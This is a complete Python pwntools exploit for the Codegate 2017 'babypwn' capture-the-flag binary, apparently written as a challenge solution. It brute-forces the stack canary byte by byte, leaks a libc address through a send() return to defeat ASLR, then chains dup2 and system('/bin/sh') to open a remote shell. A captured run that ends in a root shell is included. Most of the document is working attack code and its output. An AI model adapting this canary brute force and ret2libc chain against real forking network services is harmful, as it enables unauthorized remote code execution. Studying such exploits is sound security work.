from pwn import *
import sys
# Target endpoint: the challenge service running on the local machine.
HOST = '127.0.0.1'
PORT = 8181

# Packing / ELF conventions for pwntools: 32-bit Linux, so flat()/u32() and
# the ELF symbol lookups below use 4-byte little-endian words.
context.os = "linux"
context.arch = "i386"
# context.log_level = 'DEBUG'

# Symbols and GOT slots come from the challenge binary; libc offsets come from
# this file, which therefore has to be the very libc build the target runs
# (stage 2 rebases libc from a single leaked pointer using these offsets).
elf = ELF("./babypwn")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
def screen_clean():
    """Erase the previous terminal line.

    Writes two ANSI control sequences to stdout: ``ESC [ F`` (move the cursor
    to the start of the previous line) followed by ``ESC [ K`` (erase to the
    end of that line). The script calls it right after every ``remote()``
    so that the per-connection line pwntools prints does not pile up during
    the brute force (presumably; it is purely cosmetic either way).
    """
    for sequence in ("\033[F", "\033[K"):
        sys.stdout.write(sequence)
def canary_bruteforce(offset):
    """Recover the 4-byte stack canary one byte at a time over the network.

    For every byte position a fresh connection is opened per guess. A guess
    counts as correct when the service still answers after option "3"
    (``r.recv()`` returns), and as wrong when the connection is torn down
    (``EOFError``). Correct bytes are appended to ``canary_value`` and the
    search moves on to the next position.

    This only works if every connection sees the same canary value: the
    function accumulates bytes across separate connections, so that
    assumption is implicit (presumably a forking server that never
    re-executes; the ``fork`` GOT lookup in stage 2 points that way, but
    confirm against the binary).

    offset:  number of filler bytes written before the canary slot.
    returns: the canary as an unsigned little-endian 32-bit integer (``u32``).

    NOTE(review): the inner loop only tries ``word`` in 0x00..0xfe, and the
    outer ``while`` has no attempt limit, so a byte position that never
    matches makes the function loop forever instead of failing.
    """
    junk = "A" * offset
    canary_value = ""  # bytes recovered so far (Python 2 str, one char per byte)
    while len(canary_value) < 4:
        word = 0x00
        while word < 0xff:
            try:
                r = remote(HOST, PORT)
                screen_clean()
                # filler, then the bytes already known, then the current guess
                payload = ""
                payload += junk
                payload += canary_value
                payload += chr(word)
                r.sendlineafter("> ", "2")
                r.sendafter("Message : ", payload)
                r.sendlineafter("> ", "3")
                # If the canary check failed the connection is gone and this
                # raises EOFError; otherwise the guessed byte was right.
                r.recv()
                log.success("Byte found: " + hex(word))
                canary_value += chr(word)
                r.close()
                screen_clean()
                break  # leave the guess loop; the outer loop takes the next byte
            except EOFError as error:  # `error` is unused; kept as written
                word += 1
                r.close()
                screen_clean()
    return u32(canary_value)
# ---- Stage 1: recover the stack canary ----------------------------------
log.info("Deploying stage 1: Canary bruteforce")
# Distance from the start of the message buffer to the canary slot, as used
# by canary_bruteforce() for its filler; a value the author determined for
# this binary.
canary_offset = 40
canary_value = canary_bruteforce(canary_offset)
log.success("Canary value: %s" % hex(canary_value))
log.info("Deploying stage 2: Leak base libc address")
# Overflow payload in the order it lands on the stack: filler up to the canary,
# the canary recovered in stage 1 (so the check passes), 0xc bytes up to the
# saved return address (distance chosen by the author), then a fake frame that
# returns into send() with the arguments listed below.
leak = flat(
    "A" * canary_offset,
    canary_value,
    "B" * 0xc,
    elf.sym['send'],   # overwritten return address -> send()
    "AAAA",            # send()'s own return address; nothing useful runs after it
    0x4,               # send() fd -- presumably the client socket; confirm against the binary
    elf.got['fork'],   # send() buf: the GOT slot of fork(); holds its libc address once resolved (the transcript shows it is)
    0x4,               # send() len: one 32-bit pointer
    0x0,               # send() flags
    endianness = 'little', word_size = 32, sign = False)
r = remote(HOST, PORT)
screen_clean()
r.sendlineafter("> ", "2")  # same menu path as stage 1: option 2 takes the message
r.sendafter("Message : ", leak)
r.sendlineafter("> ", "3")  # option 3 is what made the overwritten frame take effect in stage 1
fork_leak = u32(r.recv(4))  # the 4 bytes send() wrote back
log.success("Leaked fork@@GLIBC address: " + hex(fork_leak))
r.close()
screen_clean()
# Rebase libc on the single leaked pointer. Every address used in stage 3 is
# derived from this, so it is only right if the target runs the same libc
# build as the file loaded into `libc`.
libc.address = fork_leak - libc.sym['fork']
log.success("Base libc address: " + hex(libc.address))
log.success("Dup2@@GLIBC address: " + hex(libc.sym['dup2']))
log.success("System@@GLIBC address: " + hex(libc.sym['system']))
# libc.search() returns an iterator; `.next()` is the Python 2 protocol
# (under Python 3 this line would need next(...)).
log.success("/bin/sh address: " + hex(libc.search('/bin/sh').next()))
log.info("Deploying stage 3: Shell spawn")
# Same frame layout as stage 2, but the fake frame is a return-into-libc chain:
#   dup2(4, 0); dup2(4, 1); system("/bin/sh") with exit() as its return address.
# After each dup2() the two-pop gadget at 0x08048b84 (an address in the
# non-PIE binary, found by the author) discards the two arguments so the next
# call address becomes the next return target.
shell = flat(
    "A" * canary_offset,
    canary_value,
    "B" * 0xc,
    libc.sym['dup2'],
    0x08048b84, # pop edi ; pop ebp ; ret (Cleaning the stack)
    0x4,        # dup2 oldfd -- presumably the client socket (same value stage 2 used for send)
    0x0,        # dup2 newfd: stdin
    libc.sym['dup2'],
    0x08048b84, # pop edi ; pop ebp ; ret (Cleaning the stack)
    0x4,
    0x1,        # dup2 newfd: stdout
    libc.sym['system'],
    libc.sym['exit'],               # return address for system(): exit instead of crashing
    libc.search('/bin/sh').next(),  # system() argument (Python 2 iterator protocol)
    endianness = 'little', word_size = 32, sign = False)
r = remote(HOST, PORT)
screen_clean()
r.sendlineafter("> ", "2")
r.sendafter("Message : ", shell)
r.sendlineafter("> ", "3")
r.interactive()  # hand the socket, now wired to the shell's stdin/stdout, to the user
r.close()
screen_clean()
# Sample run transcript, left by the author as a bare module-level string
# (evaluated and discarded at import time; it has no effect on the script).
# The checksec lines in it explain the technique: "Canary found" is why
# stage 1 brute-forces the canary, "NX enabled" is why stage 3 reuses libc
# functions instead of injecting code, and "No PIE" is why the gadget address
# in stage 3 can be hard-coded. The first canary byte found being 0x0 matches
# a glibc-style canary whose lowest byte is zero.
'''
kaorz@kali:~/Exp/babypwn_codegate_2017# python exploit.py
[*] '/root/Desktop/Exp/Exp/babypwn_codegate_2017/babypwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Deploying stage 1: Canary bruteforce
[+] Byte found: 0x0
[+] Byte found: 0xd0
[+] Byte found: 0xc9
[+] Byte found: 0xb0
[+] Canary value: 0xb0c9d000
[*] Deploying stage 2: Leak base libc address
[+] Leaked fork@@GLIBC address: 0xf7dcb190
[+] Base libc address: 0xf7d0d000
[+] Dup2@@GLIBC address: 0xf7df32a0
[+] System@@GLIBC address: 0xf7d49d10
[+] /bin/sh address: 0xf7e88988
[*] Deploying stage 3: Shell spawn
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) grupos=0(root)
'''